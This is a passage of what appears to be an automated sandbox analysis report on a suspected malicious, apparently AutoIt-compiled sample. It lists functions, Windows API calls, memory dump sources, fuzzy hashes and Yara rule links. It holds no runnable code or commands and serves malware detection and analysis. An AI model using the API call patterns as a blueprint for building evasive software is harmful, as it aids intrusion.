Instruction ID: b3a78f55f07fd84e5286c734c5fbccba74cf03fa985fedb69bedc16999c8a700
Opcode Fuzzy Hash: e54cd29fb37ac70eea732d51374d90da582ce3cddee2e9ecf68c6d057c22c313
Instruction Fuzzy Hash: E5F09671900A04DADB20AF779C017ED7AE56F81BB5F288109A464AB2C1CBBC8942BF51

Function 00CC7C70 Relevance: 1.7, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00CC74E0: GetFileAttributesW.KERNELBASE(?), ref: 00CC74EB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00CC7DBA

Memory Dump Source

Source File: 00000000.00000002.1454627695.0000000000CC6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CC6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc6000_7b4Iaf58Rp.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 26aa2882343acbdd13f4ce047db1bb3cf9ed750fa7c2be8ed5ce14674562866c
Instruction ID: 5aa190da1d7bbeb997211aa40b6bf7fe9f6ab6bc6b59961d3de475b7383c7dbd
Opcode Fuzzy Hash: 26aa2882343acbdd13f4ce047db1bb3cf9ed750fa7c2be8ed5ce14674562866c
Instruction Fuzzy Hash: 99518531A1420996DF14EFA0C844FEE733AEF58700F00466CF509EB290EB799B45CBA5

Function 00FB0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00FB0CB7

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 0c70f8a1212a049b1ef5c652a719371ae5c3c9185729f6d582c92634c9239685
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 5331D9B5A001059FC718DF5AC484AAAFBA5FB59310B648795E40ACB351DB31EDC1EFC0

Function 00FCFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00FCFCB7

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d449f72c57d1c48ee6e46a304de900083c30bddf3be901796233b1970524be40
Instruction ID: 4f20e816a9d34e7c4fd8eccba37b70a5053e88e7d9ad682d85383f7f5349c426
Opcode Fuzzy Hash: d449f72c57d1c48ee6e46a304de900083c30bddf3be901796233b1970524be40
Instruction Fuzzy Hash: 18410874904341CFEB14DF18C484B1ABBE1BF45314F09889CE8998B362C735E845DF92

Function 00F97B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F97BB3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: eb3470f4d275a3dd121c03c889a9296ecadafece5111e3b4333d9393b5004e34
Instruction ID: b507b567f6f8d33a5df2ad6fdaa0062d2b1417e98d4f667e1156e544d9c119e7
Opcode Fuzzy Hash: eb3470f4d275a3dd121c03c889a9296ecadafece5111e3b4333d9393b5004e34
Instruction Fuzzy Hash: 1E213872A1470AEBDF249F16ED82BAE7BB4FB54350F20846DE485C5094EB31D190E705

Function 00FB06FE Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25aca5201f14aa7f9276b2b245522c22aef7c229ef520d6bc427b361eae3eb74
Instruction ID: ae5facff06426e86ed270f1981f69a41640c7890534f2957ec7330a50ed8a89d
Opcode Fuzzy Hash: 25aca5201f14aa7f9276b2b245522c22aef7c229ef520d6bc427b361eae3eb74
Instruction Fuzzy Hash: 2E21C636009282AFE313973498829E7BF95DF83224B1884EEECC657866CA705847CB91

Function 00F94DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F94BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00F94BEF

Part of subcall function 00FB525B: __wfsopen.LIBCMT ref: 00FB5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F94E0F

Part of subcall function 00F94B6A: FreeLibrary.KERNEL32(00000000), ref: 00F94BA4

Part of subcall function 00F94C70: _memmove.LIBCMT ref: 00F94CBA

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 3eb0f4322b3e0cc5308f0b16061e219acbf1fd0e69f922957ecc8cfe3bdda17e
Instruction ID: be18b1a874224796c23530eccb068f1ea1c7073a45c9c016d4f791d788ba2f32
Opcode Fuzzy Hash: 3eb0f4322b3e0cc5308f0b16061e219acbf1fd0e69f922957ecc8cfe3bdda17e
Instruction Fuzzy Hash: F2110632A00206ABEF14FF70CC52FAD77A8AF94710F10882DF541A7181DB79AE06BB50

Function 00FCFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00FCFD91

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: acbbdfb32fd45d51d810f651cf9d54f00b17b561cbac762acacedfbe37bb8dc6
Instruction ID: 5616f7f908b6b13761bf3429ab5e3a293c61a594c601d324346dc924978974dd
Opcode Fuzzy Hash: acbbdfb32fd45d51d810f651cf9d54f00b17b561cbac762acacedfbe37bb8dc6
Instruction Fuzzy Hash: A52113B4908302DFDB14DF64C844B1ABBE1BF88314F05896CE98A57722D735E809EB92

Function 00FB4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00FB48A6

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 67a3c6f3b8b16baf55024c7e27c7795bf6e6b1ad4d6f82f6cdbe97aaa5bf4b1b
Instruction ID: 45b9327290abb3244f620505614ed6b3ced9b9f94d05eeaa666acb0e86c7a2f6
Opcode Fuzzy Hash: 67a3c6f3b8b16baf55024c7e27c7795bf6e6b1ad4d6f82f6cdbe97aaa5bf4b1b
Instruction Fuzzy Hash: 66F0FF31900208ABDF11AFB2CD063EE36A5AF40326F148418B4209A182CB7CC952FF51

Function 00F94E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,010552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F94E7E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d8a3761fa9aa3ce08b22aba1a5f45ccfdec4287c63588ea277ce04a027c20a83
Instruction ID: 74fc6f1a295f07ab6686748f318033e3f3cdd23beeca3dff1cc2b887100b6b0a
Opcode Fuzzy Hash: d8a3761fa9aa3ce08b22aba1a5f45ccfdec4287c63588ea277ce04a027c20a83
Instruction Fuzzy Hash: B4F03971901712CFEF34AF64E494C16BBE1BF243393248A3EE1D682610C776A885EF40

Function 00FB0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB07B0

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 1a22dcff03a3ea6c6fec8934afdf26990aa43042ee9c33e8848fdcfb4f974d44
Instruction ID: b3b8bbcdbb2c84bc0a5ac3ef98f36c36eb6ec9b4db85424f563d63c6213a0f65
Opcode Fuzzy Hash: 1a22dcff03a3ea6c6fec8934afdf26990aa43042ee9c33e8848fdcfb4f974d44
Instruction Fuzzy Hash: 45E0863690422957C720A5589C06FEA779DDB896A0F0441B5FC08D7209D9699C908690

Function 00FF8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00FF8EC1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: e451eaa41649b7f0a7a75ecef5d69487577859b11a62d1f25b9dd4fa05131d90
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 0DE092B1504B045BDB388A24DC00BE373E1AF09315F04081DF2AA83252EB6278429B59

Function 00CC74E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00CC74EB

Memory Dump Source

Source File: 00000000.00000002.1454627695.0000000000CC6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CC6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc6000_7b4Iaf58Rp.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: e9fb22333d24f22bdd4caddc71c81bf31cf004f974e0390126886b3b72c3bc72
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 22E08C30A09208EBCB25CAB8CC08FE977A8E706320F104B59E816C3280D5308E41AF14

Function 00CC74B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00CC74BB

Memory Dump Source

Source File: 00000000.00000002.1454627695.0000000000CC6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CC6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc6000_7b4Iaf58Rp.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: faaca91ae90bbeb98c5d57173d81663206a130b7df944343fe3aed4de66ba4c0
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: B8D0A73190920CEBCB10CFB4DD04EDA77A8D714321F104798FD15C3280D6319E409F50

Function 00FB525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00FB5266

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 5a9bf8b470b75ed488a3fb52de82c8f8663c4c4ea96519a19f4525d6f0398088
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: C4B0927644020C77CE022A82EC02B893B199B42B64F408020FB0C18162A67BAA64AA89

Function 00CC8EAC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00CC8EC1

Memory Dump Source

Source File: 00000000.00000002.1454627695.0000000000CC6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CC6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc6000_7b4Iaf58Rp.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 86eca9e0d0d3abea0b9d4fe6eba5345801a442044c5c678fda24de03b6ed288d
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 99E0BF7494010DEFDB00EFA4D5496DE7BB4EF04301F1005A5FD05D7680DB309E548A62

Function 00CC8EB0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00CC8EC1

Memory Dump Source

Source File: 00000000.00000002.1454627695.0000000000CC6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CC6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc6000_7b4Iaf58Rp.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 1f16737d52a25f5e7a3e51d1f5d0118a0f087ce044a81b883dc485e93d122886
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 1EE0E67494010DDFDB00EFB4D54969F7FB4EF04301F1001A5FD01D2280DA309D548A62

Non-executed Functions

Function 0101CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0101CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0101CB95
GetWindowLongW.USER32(?,000000F0), ref: 0101CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0101CC00
SendMessageW.USER32 ref: 0101CC29
_wcsncpy.LIBCMT ref: 0101CC95
GetKeyState.USER32(00000011), ref: 0101CCB6
GetKeyState.USER32(00000009), ref: 0101CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0101CCD9
GetKeyState.USER32(00000010), ref: 0101CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0101CD0C
SendMessageW.USER32 ref: 0101CD33
SendMessageW.USER32(?,00001030,?,0101B348), ref: 0101CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0101CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0101CE60
SetCapture.USER32(?), ref: 0101CE69
ClientToScreen.USER32(?,?), ref: 0101CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0101CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0101CEF5
ReleaseCapture.USER32 ref: 0101CF00
GetCursorPos.USER32(?), ref: 0101CF3A
ScreenToClient.USER32(?,?), ref: 0101CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0101CFA3
SendMessageW.USER32 ref: 0101CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0101D00E
SendMessageW.USER32 ref: 0101D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0101D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0101D06D
GetCursorPos.USER32(?), ref: 0101D08D
ScreenToClient.USER32(?,?), ref: 0101D09A
GetParent.USER32(?), ref: 0101D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0101D123
SendMessageW.USER32 ref: 0101D154
ClientToScreen.USER32(?,?), ref: 0101D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0101D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0101D20C
SendMessageW.USER32 ref: 0101D22F
ClientToScreen.USER32(?,?), ref: 0101D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0101D2B5

Part of subcall function 00F925DB: GetWindowLongW.USER32(?,000000EB), ref: 00F925EC

GetWindowLongW.USER32(?,000000F0), ref: 0101D351

Strings

F, xrefs: 0101D235
@GUI_DRAGID, xrefs: 0101CE9C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 012f77758d58a808364537e6da6bc87374d070f73fdbdf91c70c5c0e775e33fb
Instruction ID: aaacc1bd164890f22f864d93e9fbdf4ff2821c9183d77f3801f9781315457f25
Opcode Fuzzy Hash: 012f77758d58a808364537e6da6bc87374d070f73fdbdf91c70c5c0e775e33fb
Instruction Fuzzy Hash: C942BF34104341AFEB21CF28C988AAABFE5FF48350F040959F6D5D72A9C73AE854EB51

Function 01017DDB Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 010184D0

Strings

%d/%02d/%02d, xrefs: 01018209

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 1ce63ce3515f46b08ca3fd3bff0b1a30375881e4f198968cd6faeab0afff4f18
Instruction ID: b6f70ef650c83a21dac6aa1d700c35609126bbcf5bc3dc9e4ee109e29fd775e2
Opcode Fuzzy Hash: 1ce63ce3515f46b08ca3fd3bff0b1a30375881e4f198968cd6faeab0afff4f18
Instruction Fuzzy Hash: E112D271500205ABEB258F68CC49FAF7BE4EF49310F10865EF995EA2D9DF789A41CB10

Function 00FA6F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FA71C3
_memset.LIBCMT ref: 00FA7539
_memmove.LIBCMT ref: 00FA76AC

Strings

Q\E, xrefs: 00FA7FCB
\b(?<=\w), xrefs: 00FE3773
DEFINE, xrefs: 00FE2103
[:>:]], xrefs: 00FA7492
\b(?=\w), xrefs: 00FE3769
[:<:]], xrefs: 00FA7479

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: edbaabd6eb7288ffacba7420e27496a73e94aa15257d5412e971dd4e362ea666
Instruction ID: 81888f4c74955fbaa649f8554ecaf5222b70a0b2428751d9e57fd2ce1d051581
Opcode Fuzzy Hash: edbaabd6eb7288ffacba7420e27496a73e94aa15257d5412e971dd4e362ea666
Instruction Fuzzy Hash: 8993B371E00259DFDB24CF59C885BADB7B1FF48320F25816AE945EB281E7749E81EB40

Function 00F948D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00F948DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FCD665
IsIconic.USER32(?), ref: 00FCD66E
ShowWindow.USER32(?,00000009), ref: 00FCD67B
SetForegroundWindow.USER32(?), ref: 00FCD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FCD69B
GetCurrentThreadId.KERNEL32 ref: 00FCD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FCD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00FCD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00FCD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00FCD6CF
SetForegroundWindow.USER32(?), ref: 00FCD6D2
